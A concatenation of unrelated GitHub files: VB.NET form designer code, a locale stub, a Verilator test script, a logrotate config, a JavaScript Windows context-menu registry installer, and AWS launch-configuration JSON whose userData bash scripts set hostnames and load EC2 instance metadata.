Me.Controls.Add(Me.GroupBox2)
Me.Name = "EditingForm_Adjust"
Me.ToolTipChangeTag.SetToolTip(Me, resources.GetString("$this.ToolTip"))
Me.ToolTipValues.SetToolTip(Me, resources.GetString("$this.ToolTip1"))
Me.ToolTip1.SetToolTip(Me, resources.GetString("$this.ToolTip2"))
Me.GroupBox5.ResumeLayout(False)
Me.GroupBox5.PerformLayout()
Me.GroupBox4.ResumeLayout(False)
Me.GroupBox2.ResumeLayout(False)
Me.GroupBox2.PerformLayout()
Me.GroupBox1.ResumeLayout(False)
Me.GroupBox1.PerformLayout()
Me.ResumeLayout(False)
End Sub
Public WithEvents GroupBox5 As System.Windows.Forms.GroupBox
Public WithEvents chkActive As System.Windows.Forms.CheckBox
Public WithEvents Label11 As System.Windows.Forms.Label
Public WithEvents GroupBox4 As System.Windows.Forms.GroupBox
Public WithEvents rtbAnnotations As Extended.Windows.Forms.RichTextBoxExtended
Public WithEvents GroupBox2 As System.Windows.Forms.GroupBox
Public WithEvents GroupBox1 As System.Windows.Forms.GroupBox
Public WithEvents Label7 As System.Windows.Forms.Label
Public WithEvents cbSourceProp As System.Windows.Forms.ComboBox
Public WithEvents cbSourceObj As System.Windows.Forms.ComboBox
Public WithEvents Label19 As System.Windows.Forms.Label
Public WithEvents ToolTip1 As System.Windows.Forms.ToolTip
Public WithEvents lblTag As System.Windows.Forms.TextBox
Public WithEvents Label2 As System.Windows.Forms.Label
Public WithEvents cbTargetProp As System.Windows.Forms.ComboBox
Public WithEvents cbTargetObj As System.Windows.Forms.ComboBox
Public WithEvents Label4 As System.Windows.Forms.Label
Public WithEvents lblTargetVal As System.Windows.Forms.Label
Public WithEvents lblSourceVal As System.Windows.Forms.Label
Public WithEvents Label6 As System.Windows.Forms.Label
Public WithEvents Label5 As System.Windows.Forms.Label
Public WithEvents chkSolveGlobal As System.Windows.Forms.CheckBox
Public WithEvents btnOpenControlPanel As System.Windows.Forms.Button
Public WithEvents tbSetPoint As System.Windows.Forms.TextBox
Public WithEvents Label3 As System.Windows.Forms.Label
Public WithEvents lblSPUnits As System.Windows.Forms.Label
Public WithEvents tbTolerance As System.Windows.Forms.TextBox
Public WithEvents Label1 As System.Windows.Forms.Label
Friend WithEvents ToolTipChangeTag As ToolTip
Friend WithEvents chkUseReferenced As CheckBox
Public WithEvents lblRefVal As Label
Public WithEvents Label9 As Label
Public WithEvents Label10 As Label
Public WithEvents cbRefProp As ComboBox
Public WithEvents cbRefObj As ComboBox
End Class
| {
"pile_set_name": "Github"
} |
<?xml version="1.0" encoding="UTF-8" ?>
<ldml>
<identity>
<version number="$Revision: 1.16 $"/>
<generation date="$Date: 2009/05/05 23:06:38 $"/>
<language type="ny"/>
<territory type="MW"/>
</identity>
</ldml>
| {
"pile_set_name": "Github"
} |
#!/usr/bin/env perl
if (!$::Driver) { use FindBin; exec("$FindBin::Bin/bootstrap.pl", @ARGV, $0); die; }
# DESCRIPTION: Verilator: Verilog Test driver/expect definition
#
# Copyright 2003 by Wilson Snyder. This program is free software; you
# can redistribute it and/or modify it under the terms of either the GNU
# Lesser General Public License Version 3 or the Perl Artistic License
# Version 2.0.
# SPDX-License-Identifier: LGPL-3.0-only OR Artistic-2.0
scenarios(simulator => 1);
compile(
);
execute(
check_finished => 1,
);
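# Note (hedged): check_finished asserts the simulation reached $finish; the
# Verilog source under test is assumed to be found by the driver's defaults
# (a .v file sharing this script's basename).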
ok(1);
1;
| {
"pile_set_name": "Github"
} |
# Rotate the Centrifugo logs daily, keeping seven compressed rotations.
# copytruncate truncates the live file in place so the daemon can keep its
# open file handle; missingok suppresses errors when no log exists yet.
/var/log/centrifugo/*log {
copytruncate
daily
rotate 7
compress
missingok
}
| {
"pile_set_name": "Github"
} |
/**
* @see https://msdn.microsoft.com/en-us/library/windows/desktop/cc144171(v=vs.85).aspx
*/
import bluebird from 'bluebird';
import win32Registry from '../win32/registry';
const packageName = 'rodeo',
appName = 'Rodeo',
fileKeyPath = `HKCU\\Software\\Classes\\.py\\shell\\${appName}`,
directoryKeyPath = `HKCU\\Software\\Classes\\directory\\shell\\${appName}`,
backgroundKeyPath = `HKCU\\Software\\Classes\\directory\\background\\shell\\${appName}`,
applicationsKeyPath = `HKCU\\Software\\Classes\\Applications\\${packageName}.exe`;
/**
* Install file handler
* @param {string} execPath
* @param {string} systemRoot
* @returns {Promise.<{errors: Error[], stderr: string, stdout: string}>}
*/
function installFileHandler(execPath, systemRoot) {
const args = [
`${applicationsKeyPath}\\shell\\open\\command`,
'/ve',
'/d',
`\"${execPath}\" \"%1\"`
];
return win32Registry.add(args, systemRoot);
}
/**
* Add an "Open with Rodeo" entry to the shell context menu under the given registry key
* @param {string} execPath full path to the application executable
* @param {string} keyPath registry key to create the menu entry under
* @param {string} arg shell placeholder passed to the command: '%1' for files
* and directories, '%V' for a folder background
* @param {string} systemRoot Windows system root directory
* @returns {Promise}
*/
function installMenu(execPath, keyPath, arg, systemRoot) {
const args = [keyPath, '/ve', '/d', `Open with ${appName}`];
return bluebird.all([
win32Registry.add(args, systemRoot),
win32Registry.add([keyPath, '/v', 'Icon', '/d', `\"${execPath}\"`], systemRoot),
win32Registry.add([`${keyPath}\\command`, '/ve', '/d', `\"${execPath}\" \"${arg}\"`], systemRoot)
]);
}
/**
* Register the context-menu entries and the .py file handler
* @param {string} execPath full path to the application executable
* @param {string} systemRoot Windows system root directory
* @returns {Promise}
*/
function install(execPath, systemRoot) {
return bluebird.all([
installMenu(execPath, fileKeyPath, '%1', systemRoot),
installMenu(execPath, directoryKeyPath, '%1', systemRoot),
installMenu(execPath, backgroundKeyPath, '%V', systemRoot),
installFileHandler(execPath, systemRoot)
]);
}
/**
* Remove every registry key created by install
* @param {string} systemRoot Windows system root directory
* @returns {Promise}
*/
function uninstall(systemRoot) {
return bluebird.all([
win32Registry.remove(fileKeyPath, systemRoot),
win32Registry.remove(directoryKeyPath, systemRoot),
win32Registry.remove(backgroundKeyPath, systemRoot),
win32Registry.remove(applicationsKeyPath, systemRoot)
]);
}
module.exports.install = install;
module.exports.uninstall = uninstall;
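// Hedged usage sketch (illustrative only; the Electron-style `app` ready hook,
// the module path, and the SystemRoot environment variable are assumptions,
// not part of this module):
//   const handlers = require('./context-menu'); // placeholder path
//   app.on('ready', () => {
//     handlers.install(process.execPath, process.env.SystemRoot)
//       .catch(err => console.error('shell integration install failed', err));
//   });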
| {
"pile_set_name": "Github"
} |
[
{
"blockDeviceMappings":
[
],
"class": "com.amazonaws.services.autoscaling.model.LaunchConfiguration",
"createdTime": "2011-10-11T16:14:32Z",
"imageId": "ami-e9ea2680",
"instanceMonitoring": {
"class": "com.amazonaws.services.autoscaling.model.InstanceMonitoring",
"enabled": true
},
"instanceType": "m1.large",
"kernelId": "",
"keyName": "nf-test-keypair-a",
"launchConfigurationARN": "arn:aws:autoscaling:us-east-1:179000000000:launchConfiguration:488db6d8-2b4d-4bc8-a468-48e445c18937:launchConfigurationName/akms-v002-20111011091431",
"launchConfigurationName": "akms-v002-20111011091431",
"ramdiskId": "",
"securityGroups":
[
"akms",
"nf-datacenter",
"nf-infrastructure"
],
"userData": "#!/bin/bash\n# udf0 begin\nexec 1>/var/ec2/userdata.log\nexec 2>&1\nset -x\n\nPATH=/bin:/usr/bin:/usr/sbin:/sbin\n\napp=\"akms\"\nappenv=\"test\"\nregion=\"us-east-1\"\nappuser=\"${app}${appenv}\"\nstack=\"\"\ncluster=\"akms\"\nautogrp=\"akms-v002\"\nlaunchconfig=\"akms-v002-20111011091431\"\nclusterorapp=${cluster:-$app}\nnflxbase=`rpm -q nflx-base | sed 's:nflx-base-1..-\\(.*\\)$:\\1:'`\nappdynappname=\"$region $appenv\"\n\nsetenv_sh=\"/apps/tomcat/bin/setenv.sh\"\nNFenv=\"/apps/tomcat/bin/netflix.env\"\nserver_template_xml=\"/apps/tomcat/conf/server_template.xml\"\nserver_xml=\"/apps/tomcat/conf/server.xml\"\ninstanceid=`/usr/bin/instance-id`\n\n# udf0 end\n# udf-test begin\n\n# udf-test end\n# udf1 begin\nhostnamestring=${clusterorapp}-${instanceid}\nhostname $hostnamestring\nprintf \"/^HOSTNAME/ d\\n $\\na\\nHOSTNAME=${hostnamestring}\\n.\\nw\\nq\\n\" | ed -s /etc/sysconfig/network\necho \"127.0.0.1 localhost\" > /etc/hosts\nprintf \"%s\\t%s %s.netflix.com %s\\n\" `local-ipv4` `hostname` `hostname` `public-hostname` >> /etc/hosts\ntest -n \"$reg_hosts\" && echo $reg_hosts >> /etc/hosts\n\ncurl=\"curl --retry 3 --silent --show-error --fail\"\nmetadatavars() {\nlocal url=$1\nfor uri in `$curl $url`\ndo\necho $uri | grep -q -E '=' && continue\necho $uri | grep -q -E 'public' && continue\nif echo $uri | grep -q -E '/$'\nthen\nmetadatavars \"${url}${uri}\"\nelse\nprintf \"export EC2_%s=\\\"%s\\\"\\n\" `echo $uri | tr '/-' '_' | tr 'a-z' 'A-Z'` \"`$curl ${url}${uri}| tr '\\n' ' '`\"\nfi\ndone\n}\n\nmetadatavars http://169.254.169.254/latest/meta-data/ >> /etc/profile.d/netflix_environment.sh\n. /etc/profile.d/netflix_environment.sh\n\nln -s $jmxf $jmxl\n\nif newbase\nthen\n/usr/local/bin/installcrontab $appuser\nelse\nfi\n\nif ! grep -q '/etc/alternatives/java_sdk/lib/tools.jar' /apps/tomcat/bin/setclasspath.sh\nthen\nfi\n\n# udf1 end\n\nserver_template_crl=/apps/tomcat/conf/server_template_2011.xml \n\n# end added for CRL support\n\ntouch /tmp/udf-complete\n# udf2 end\n\n"
},
{
"blockDeviceMappings":
[
],
"class": "com.amazonaws.services.autoscaling.model.LaunchConfiguration",
"createdTime": "2011-10-11T16:24:57Z",
"imageId": "ami-e9ea2680",
"instanceMonitoring": {
"class": "com.amazonaws.services.autoscaling.model.InstanceMonitoring",
"enabled": true
},
"instanceType": "m1.large",
"kernelId": "",
"keyName": "nf-test-keypair-a",
"launchConfigurationARN": "arn:aws:autoscaling:us-east-1:179000000000:launchConfiguration:f97645c6-2653-4b25-825c-e0d78b991b28:launchConfigurationName/akms-v002-20111011092456",
"launchConfigurationName": "akms-v002-20111011092456",
"ramdiskId": "",
"securityGroups":
[
"akms",
"nf-datacenter",
"nf-infrastructure"
],
"userData": "#!/bin/bash\n# udf0 begin\nexec 1>/var/ec2/userdata.log\nexec 2>&1\nset -x\n\nPATH=/bin:/usr/bin:/usr/sbin:/sbin\n\napp=\"akms\"\nappenv=\"test\"\nregion=\"us-east-1\"\nappuser=\"${app}${appenv}\"\nstack=\"\"\ncluster=\"akms\"\nautogrp=\"akms-v002\"\nlaunchconfig=\"akms-v002-20111011092456\"\nclusterorapp=${cluster:-$app}\nnflxbase=`rpm -q nflx-base | sed 's:nflx-base-1..-\\(.*\\)$:\\1:'`\nappdynappname=\"$region $appenv\"\n\nsetenv_sh=\"/apps/tomcat/bin/setenv.sh\"\nNFenv=\"/apps/tomcat/bin/netflix.env\"\nserver_template_xml=\"/apps/tomcat/conf/server_template.xml\"\nserver_xml=\"/apps/tomcat/conf/server.xml\"\ninstanceid=`/usr/bin/instance-id`\n\n# udf0 end\n# udf-test begin\n\n# udf-test end\n# udf1 begin\nhostnamestring=${clusterorapp}-${instanceid}\nhostname $hostnamestring\nprintf \"/^HOSTNAME/ d\\n $\\na\\nHOSTNAME=${hostnamestring}\\n.\\nw\\nq\\n\" | ed -s /etc/sysconfig/network\necho \"127.0.0.1 localhost\" > /etc/hosts\nprintf \"%s\\t%s %s.netflix.com %s\\n\" `local-ipv4` `hostname` `hostname` `public-hostname` >> /etc/hosts\ntest -n \"$reg_hosts\" && echo $reg_hosts >> /etc/hosts\n\ncurl=\"curl --retry 3 --silent --show-error --fail\"\nmetadatavars() {\nlocal url=$1\nfor uri in `$curl $url`\ndo\necho $uri | grep -q -E '=' && continue\necho $uri | grep -q -E 'public' && continue\nif echo $uri | grep -q -E '/$'\nthen\nmetadatavars \"${url}${uri}\"\nelse\nprintf \"export EC2_%s=\\\"%s\\\"\\n\" `echo $uri | tr '/-' '_' | tr 'a-z' 'A-Z'` \"`$curl ${url}${uri}| tr '\\n' ' '`\"\nfi\ndone\n}\n\nmetadatavars http://169.254.169.254/latest/meta-data/ >> /etc/profile.d/netflix_environment.sh\n. /etc/profile.d/netflix_environment.sh\n\nln -s $jmxf $jmxl\n\nif newbase\nthen\n/usr/local/bin/installcrontab $appuser\nelse\nfi\n\nif ! grep -q '/etc/alternatives/java_sdk/lib/tools.jar' /apps/tomcat/bin/setclasspath.sh\nthen\nfi\n\n# udf1 end\n\nserver_template_crl=/apps/tomcat/conf/server_template_2011.xml \n\n# end added for CRL support\n\ntouch /tmp/udf-complete\n# udf2 end\n\n"
},
{
"blockDeviceMappings":
[
],
"class": "com.amazonaws.services.autoscaling.model.LaunchConfiguration",
"createdTime": "2011-10-11T23:24:15Z",
"imageId": "ami-0df33f64",
"instanceMonitoring": {
"class": "com.amazonaws.services.autoscaling.model.InstanceMonitoring",
"enabled": true
},
"instanceType": "m1.large",
"kernelId": "",
"keyName": "nf-test-keypair-a",
"launchConfigurationARN": "arn:aws:autoscaling:us-east-1:179000000000:launchConfiguration:bbfbd31b-d830-43f3-9f02-80f78b9f1b35:launchConfigurationName/akms-v002-20111011162414",
"launchConfigurationName": "akms-v002-20111011162414",
"ramdiskId": "",
"securityGroups":
[
"akms",
"nf-datacenter",
"nf-infrastructure"
],
"userData": "#!/bin/bash\n# udf0 begin\nexec 1>/var/ec2/userdata.log\nexec 2>&1\nset -x\n\nPATH=/bin:/usr/bin:/usr/sbin:/sbin\n\napp=\"akms\"\nappenv=\"test\"\nregion=\"us-east-1\"\nappuser=\"${app}${appenv}\"\nstack=\"\"\ncluster=\"akms\"\nautogrp=\"akms-v002\"\nlaunchconfig=\"akms-v002-20111011162414\"\nclusterorapp=${cluster:-$app}\nnflxbase=`rpm -q nflx-base | sed 's:nflx-base-1..-\\(.*\\)$:\\1:'`\nappdynappname=\"$region $appenv\"\n\nsetenv_sh=\"/apps/tomcat/bin/setenv.sh\"\nNFenv=\"/apps/tomcat/bin/netflix.env\"\nserver_template_xml=\"/apps/tomcat/conf/server_template.xml\"\nserver_xml=\"/apps/tomcat/conf/server.xml\"\ninstanceid=`/usr/bin/instance-id`\n\n# udf0 end\n# udf-test begin\n\n# udf-test end\n# udf1 begin\nhostnamestring=${clusterorapp}-${instanceid}\nhostname $hostnamestring\nprintf \"/^HOSTNAME/ d\\n $\\na\\nHOSTNAME=${hostnamestring}\\n.\\nw\\nq\\n\" | ed -s /etc/sysconfig/network\necho \"127.0.0.1 localhost\" > /etc/hosts\nprintf \"%s\\t%s %s.netflix.com %s\\n\" `local-ipv4` `hostname` `hostname` `public-hostname` >> /etc/hosts\ntest -n \"$reg_hosts\" && echo $reg_hosts >> /etc/hosts\n\ncurl=\"curl --retry 3 --silent --show-error --fail\"\nmetadatavars() {\nlocal url=$1\nfor uri in `$curl $url`\ndo\necho $uri | grep -q -E '=' && continue\necho $uri | grep -q -E 'public' && continue\nif echo $uri | grep -q -E '/$'\nthen\nmetadatavars \"${url}${uri}\"\nelse\nprintf \"export EC2_%s=\\\"%s\\\"\\n\" `echo $uri | tr '/-' '_' | tr 'a-z' 'A-Z'` \"`$curl ${url}${uri}| tr '\\n' ' '`\"\nfi\ndone\n}\n\nmetadatavars http://169.254.169.254/latest/meta-data/ >> /etc/profile.d/netflix_environment.sh\n. /etc/profile.d/netflix_environment.sh\n\nln -s $jmxf $jmxl\n\nif newbase\nthen\n/usr/local/bin/installcrontab $appuser\nelse\nfi\n\nif ! grep -q '/etc/alternatives/java_sdk/lib/tools.jar' /apps/tomcat/bin/setclasspath.sh\nthen\nfi\n\n# udf1 end\n\nserver_template_crl=/apps/tomcat/conf/server_template_2011.xml \n\n# end added for CRL support\n\ntouch /tmp/udf-complete\n# udf2 end\n\n"
},
{
"blockDeviceMappings":
[
],
"class": "com.amazonaws.services.autoscaling.model.LaunchConfiguration",
"createdTime": "2011-10-14T20:48:49Z",
"imageId": "ami-c13cf0a8",
"instanceMonitoring": {
"class": "com.amazonaws.services.autoscaling.model.InstanceMonitoring",
"enabled": true
},
"instanceType": "m1.large",
"kernelId": "",
"keyName": "nf-test-keypair-a",
"launchConfigurationARN": "arn:aws:autoscaling:us-east-1:179000000000:launchConfiguration:e9b014f9-2201-41a5-964c-f707f0dc22a7:launchConfigurationName/akms-v002-20111014134848",
"launchConfigurationName": "akms-v002-20111014134848",
"ramdiskId": "",
"securityGroups":
[
"akms",
"nf-datacenter",
"nf-infrastructure"
],
"userData": "#!/bin/bash\n# udf0 begin\nexec 1>/var/ec2/userdata.log\nexec 2>&1\nset -x\n\nPATH=/bin:/usr/bin:/usr/sbin:/sbin\n\napp=\"akms\"\nappenv=\"test\"\nregion=\"us-east-1\"\nappuser=\"${app}${appenv}\"\nstack=\"\"\ncluster=\"akms\"\nautogrp=\"akms-v002\"\nlaunchconfig=\"akms-v002-20111014134848\"\nclusterorapp=${cluster:-$app}\nnflxbase=`rpm -q nflx-base | sed 's:nflx-base-1..-\\(.*\\)$:\\1:'`\nappdynappname=\"$region $appenv\"\n\nsetenv_sh=\"/apps/tomcat/bin/setenv.sh\"\nNFenv=\"/apps/tomcat/bin/netflix.env\"\nserver_template_xml=\"/apps/tomcat/conf/server_template.xml\"\nserver_xml=\"/apps/tomcat/conf/server.xml\"\ninstanceid=`/usr/bin/instance-id`\n\n# udf0 end\n# udf-test begin\n\n# udf-test end\n# udf1 begin\nhostnamestring=${clusterorapp}-${instanceid}\nhostname $hostnamestring\nprintf \"/^HOSTNAME/ d\\n $\\na\\nHOSTNAME=${hostnamestring}\\n.\\nw\\nq\\n\" | ed -s /etc/sysconfig/network\necho \"127.0.0.1 localhost\" > /etc/hosts\nprintf \"%s\\t%s %s.netflix.com %s\\n\" `local-ipv4` `hostname` `hostname` `public-hostname` >> /etc/hosts\ntest -n \"$reg_hosts\" && echo $reg_hosts >> /etc/hosts\n\ncurl=\"curl --retry 3 --silent --show-error --fail\"\nmetadatavars() {\nlocal url=$1\nfor uri in `$curl $url`\ndo\necho $uri | grep -q -E '=' && continue\necho $uri | grep -q -E 'public' && continue\nif echo $uri | grep -q -E '/$'\nthen\nmetadatavars \"${url}${uri}\"\nelse\nprintf \"export EC2_%s=\\\"%s\\\"\\n\" `echo $uri | tr '/-' '_' | tr 'a-z' 'A-Z'` \"`$curl ${url}${uri}| tr '\\n' ' '`\"\nfi\ndone\n}\n\nmetadatavars http://169.254.169.254/latest/meta-data/ >> /etc/profile.d/netflix_environment.sh\n. /etc/profile.d/netflix_environment.sh\n\nln -s $jmxf $jmxl\n\nif newbase\nthen\n/usr/local/bin/installcrontab $appuser\nelse\nfi\n\nif ! grep -q '/etc/alternatives/java_sdk/lib/tools.jar' /apps/tomcat/bin/setclasspath.sh\nthen\nfi\n\n# udf1 end\n\nserver_template_crl=/apps/tomcat/conf/server_template_2011.xml \n\n# end added for CRL support\n\ntouch /tmp/udf-complete\n# udf2 end\n\n"
},
{
"blockDeviceMappings":
[
],
"class": "com.amazonaws.services.autoscaling.model.LaunchConfiguration",
"createdTime": "2011-10-14T21:16:58Z",
"imageId": "ami-c13cf0a8",
"instanceMonitoring": {
"class": "com.amazonaws.services.autoscaling.model.InstanceMonitoring",
"enabled": true
},
"instanceType": "m1.large",
"kernelId": "",
"keyName": "nf-test-keypair-a",
"launchConfigurationARN": "arn:aws:autoscaling:us-east-1:179000000000:launchConfiguration:2b2f257c-51f5-4b56-a032-c042edcd52ec:launchConfigurationName/akms-v002-20111014141657",
"launchConfigurationName": "akms-v002-20111014141657",
"ramdiskId": "",
"securityGroups":
[
"akms",
"nf-datacenter",
"nf-infrastructure"
],
"userData": "#!/bin/bash\n# udf0 begin\nexec 1>/var/ec2/userdata.log\nexec 2>&1\nset -x\n\nPATH=/bin:/usr/bin:/usr/sbin:/sbin\n\napp=\"akms\"\nappenv=\"test\"\nregion=\"us-east-1\"\nappuser=\"${app}${appenv}\"\nstack=\"\"\ncluster=\"akms\"\nautogrp=\"akms-v002\"\nlaunchconfig=\"akms-v002-20111014141657\"\nclusterorapp=${cluster:-$app}\nnflxbase=`rpm -q nflx-base | sed 's:nflx-base-1..-\\(.*\\)$:\\1:'`\nappdynappname=\"$region $appenv\"\n\nsetenv_sh=\"/apps/tomcat/bin/setenv.sh\"\nNFenv=\"/apps/tomcat/bin/netflix.env\"\nserver_template_xml=\"/apps/tomcat/conf/server_template.xml\"\nserver_xml=\"/apps/tomcat/conf/server.xml\"\ninstanceid=`/usr/bin/instance-id`\n\n# udf0 end\n# udf-test begin\n\n# udf-test end\n# udf1 begin\nhostnamestring=${clusterorapp}-${instanceid}\nhostname $hostnamestring\nprintf \"/^HOSTNAME/ d\\n $\\na\\nHOSTNAME=${hostnamestring}\\n.\\nw\\nq\\n\" | ed -s /etc/sysconfig/network\necho \"127.0.0.1 localhost\" > /etc/hosts\nprintf \"%s\\t%s %s.netflix.com %s\\n\" `local-ipv4` `hostname` `hostname` `public-hostname` >> /etc/hosts\ntest -n \"$reg_hosts\" && echo $reg_hosts >> /etc/hosts\n\ncurl=\"curl --retry 3 --silent --show-error --fail\"\nmetadatavars() {\nlocal url=$1\nfor uri in `$curl $url`\ndo\necho $uri | grep -q -E '=' && continue\necho $uri | grep -q -E 'public' && continue\nif echo $uri | grep -q -E '/$'\nthen\nmetadatavars \"${url}${uri}\"\nelse\nprintf \"export EC2_%s=\\\"%s\\\"\\n\" `echo $uri | tr '/-' '_' | tr 'a-z' 'A-Z'` \"`$curl ${url}${uri}| tr '\\n' ' '`\"\nfi\ndone\n}\n\nmetadatavars http://169.254.169.254/latest/meta-data/ >> /etc/profile.d/netflix_environment.sh\n. /etc/profile.d/netflix_environment.sh\n\nln -s $jmxf $jmxl\n\nif newbase\nthen\n/usr/local/bin/installcrontab $appuser\nelse\nfi\n\nif ! grep -q '/etc/alternatives/java_sdk/lib/tools.jar' /apps/tomcat/bin/setclasspath.sh\nthen\nfi\n\n# udf1 end\n\nserver_template_crl=/apps/tomcat/conf/server_template_2011.xml \n\n# end added for CRL support\n\ntouch /tmp/udf-complete\n# udf2 end\n\n"
},
{
"blockDeviceMappings":
[
],
"class": "com.amazonaws.services.autoscaling.model.LaunchConfiguration",
"createdTime": "2011-10-14T21:34:48Z",
"imageId": "ami-c13cf0a8",
"instanceMonitoring": {
"class": "com.amazonaws.services.autoscaling.model.InstanceMonitoring",
"enabled": true
},
"instanceType": "m1.large",
"kernelId": "",
"keyName": "nf-test-keypair-a",
"launchConfigurationARN": "arn:aws:autoscaling:us-east-1:179000000000:launchConfiguration:cbd20835-1882-4ebb-8265-8ca861a524ed:launchConfigurationName/akms-v002-20111014143448",
"launchConfigurationName": "akms-v002-20111014143448",
"ramdiskId": "",
"securityGroups":
[
"akms",
"nf-datacenter",
"nf-infrastructure"
],
"userData": "#!/bin/bash\n# udf0 begin\nexec 1>/var/ec2/userdata.log\nexec 2>&1\nset -x\n\nPATH=/bin:/usr/bin:/usr/sbin:/sbin\n\napp=\"akms\"\nappenv=\"test\"\nregion=\"us-east-1\"\nappuser=\"${app}${appenv}\"\nstack=\"\"\ncluster=\"akms\"\nautogrp=\"akms-v002\"\nlaunchconfig=\"akms-v002-20111014143448\"\nclusterorapp=${cluster:-$app}\nnflxbase=`rpm -q nflx-base | sed 's:nflx-base-1..-\\(.*\\)$:\\1:'`\nappdynappname=\"$region $appenv\"\n\nsetenv_sh=\"/apps/tomcat/bin/setenv.sh\"\nNFenv=\"/apps/tomcat/bin/netflix.env\"\nserver_template_xml=\"/apps/tomcat/conf/server_template.xml\"\nserver_xml=\"/apps/tomcat/conf/server.xml\"\ninstanceid=`/usr/bin/instance-id`\n\n# udf0 end\n# udf-test begin\n\n# udf-test end\n# udf1 begin\nhostnamestring=${clusterorapp}-${instanceid}\nhostname $hostnamestring\nprintf \"/^HOSTNAME/ d\\n $\\na\\nHOSTNAME=${hostnamestring}\\n.\\nw\\nq\\n\" | ed -s /etc/sysconfig/network\necho \"127.0.0.1 localhost\" > /etc/hosts\nprintf \"%s\\t%s %s.netflix.com %s\\n\" `local-ipv4` `hostname` `hostname` `public-hostname` >> /etc/hosts\ntest -n \"$reg_hosts\" && echo $reg_hosts >> /etc/hosts\n\ncurl=\"curl --retry 3 --silent --show-error --fail\"\nmetadatavars() {\nlocal url=$1\nfor uri in `$curl $url`\ndo\necho $uri | grep -q -E '=' && continue\necho $uri | grep -q -E 'public' && continue\nif echo $uri | grep -q -E '/$'\nthen\nmetadatavars \"${url}${uri}\"\nelse\nprintf \"export EC2_%s=\\\"%s\\\"\\n\" `echo $uri | tr '/-' '_' | tr 'a-z' 'A-Z'` \"`$curl ${url}${uri}| tr '\\n' ' '`\"\nfi\ndone\n}\n\nmetadatavars http://169.254.169.254/latest/meta-data/ >> /etc/profile.d/netflix_environment.sh\n. /etc/profile.d/netflix_environment.sh\n\nln -s $jmxf $jmxl\n\nif newbase\nthen\n/usr/local/bin/installcrontab $appuser\nelse\nfi\n\nif ! grep -q '/etc/alternatives/java_sdk/lib/tools.jar' /apps/tomcat/bin/setclasspath.sh\nthen\nfi\n\n# udf1 end\n\nserver_template_crl=/apps/tomcat/conf/server_template_2011.xml \n\n# end added for CRL support\n\ntouch /tmp/udf-complete\n# udf2 end\n\n"
},
{
"blockDeviceMappings":
[
],
"class": "com.amazonaws.services.autoscaling.model.LaunchConfiguration",
"createdTime": "2011-10-15T00:47:25Z",
"imageId": "ami-fd5f9394",
"instanceMonitoring": {
"class": "com.amazonaws.services.autoscaling.model.InstanceMonitoring",
"enabled": true
},
"instanceType": "m1.large",
"kernelId": "",
"keyName": "nf-test-keypair-a",
"launchConfigurationARN": "arn:aws:autoscaling:us-east-1:179000000000:launchConfiguration:9ae2c31f-c8cd-4ced-b5d9-f3d9e0355f6b:launchConfigurationName/akms-v002-20111014174724",
"launchConfigurationName": "akms-v002-20111014174724",
"ramdiskId": "",
"securityGroups":
[
"akms",
"nf-datacenter",
"nf-infrastructure"
],
"userData": "#!/bin/bash\n# udf0 begin\nexec 1>/var/ec2/userdata.log\nexec 2>&1\nset -x\n\nPATH=/bin:/usr/bin:/usr/sbin:/sbin\n\napp=\"akms\"\nappenv=\"test\"\nregion=\"us-east-1\"\nappuser=\"${app}${appenv}\"\nstack=\"\"\ncluster=\"akms\"\nautogrp=\"akms-v002\"\nlaunchconfig=\"akms-v002-20111014174724\"\nclusterorapp=${cluster:-$app}\nnflxbase=`rpm -q nflx-base | sed 's:nflx-base-1..-\\(.*\\)$:\\1:'`\nappdynappname=\"$region $appenv\"\n\nsetenv_sh=\"/apps/tomcat/bin/setenv.sh\"\nNFenv=\"/apps/tomcat/bin/netflix.env\"\nserver_template_xml=\"/apps/tomcat/conf/server_template.xml\"\nserver_xml=\"/apps/tomcat/conf/server.xml\"\ninstanceid=`/usr/bin/instance-id`\n\n# udf0 end\n# udf-test begin\n\n# udf-test end\n# udf1 begin\nhostnamestring=${clusterorapp}-${instanceid}\nhostname $hostnamestring\nprintf \"/^HOSTNAME/ d\\n $\\na\\nHOSTNAME=${hostnamestring}\\n.\\nw\\nq\\n\" | ed -s /etc/sysconfig/network\necho \"127.0.0.1 localhost\" > /etc/hosts\nprintf \"%s\\t%s %s.netflix.com %s\\n\" `local-ipv4` `hostname` `hostname` `public-hostname` >> /etc/hosts\ntest -n \"$reg_hosts\" && echo $reg_hosts >> /etc/hosts\n\ncurl=\"curl --retry 3 --silent --show-error --fail\"\nmetadatavars() {\nlocal url=$1\nfor uri in `$curl $url`\ndo\necho $uri | grep -q -E '=' && continue\necho $uri | grep -q -E 'public' && continue\nif echo $uri | grep -q -E '/$'\nthen\nmetadatavars \"${url}${uri}\"\nelse\nprintf \"export EC2_%s=\\\"%s\\\"\\n\" `echo $uri | tr '/-' '_' | tr 'a-z' 'A-Z'` \"`$curl ${url}${uri}| tr '\\n' ' '`\"\nfi\ndone\n}\n\nmetadatavars http://169.254.169.254/latest/meta-data/ >> /etc/profile.d/netflix_environment.sh\n. /etc/profile.d/netflix_environment.sh\n\nln -s $jmxf $jmxl\n\nif newbase\nthen\n/usr/local/bin/installcrontab $appuser\nelse\nfi\n\nif ! grep -q '/etc/alternatives/java_sdk/lib/tools.jar' /apps/tomcat/bin/setclasspath.sh\nthen\nfi\n\n# udf1 end\n\nserver_template_crl=/apps/tomcat/conf/server_template_2011.xml \n\n# end added for CRL support\n\ntouch /tmp/udf-complete\n# udf2 end\n\n"
},
{
"blockDeviceMappings":
[
],
"class": "com.amazonaws.services.autoscaling.model.LaunchConfiguration",
"createdTime": "2011-10-18T18:24:15Z",
"imageId": "ami-e3ab648a",
"instanceMonitoring": {
"class": "com.amazonaws.services.autoscaling.model.InstanceMonitoring",
"enabled": true
},
"instanceType": "m1.large",
"kernelId": "",
"keyName": "nf-test-keypair-a",
"launchConfigurationARN": "arn:aws:autoscaling:us-east-1:179000000000:launchConfiguration:bb6dba0c-e56f-4084-9953-006b46c7cf71:launchConfigurationName/akms-v002-20111018112415",
"launchConfigurationName": "akms-v002-20111018112415",
"ramdiskId": "",
"securityGroups":
[
"akms",
"nf-datacenter",
"nf-infrastructure"
],
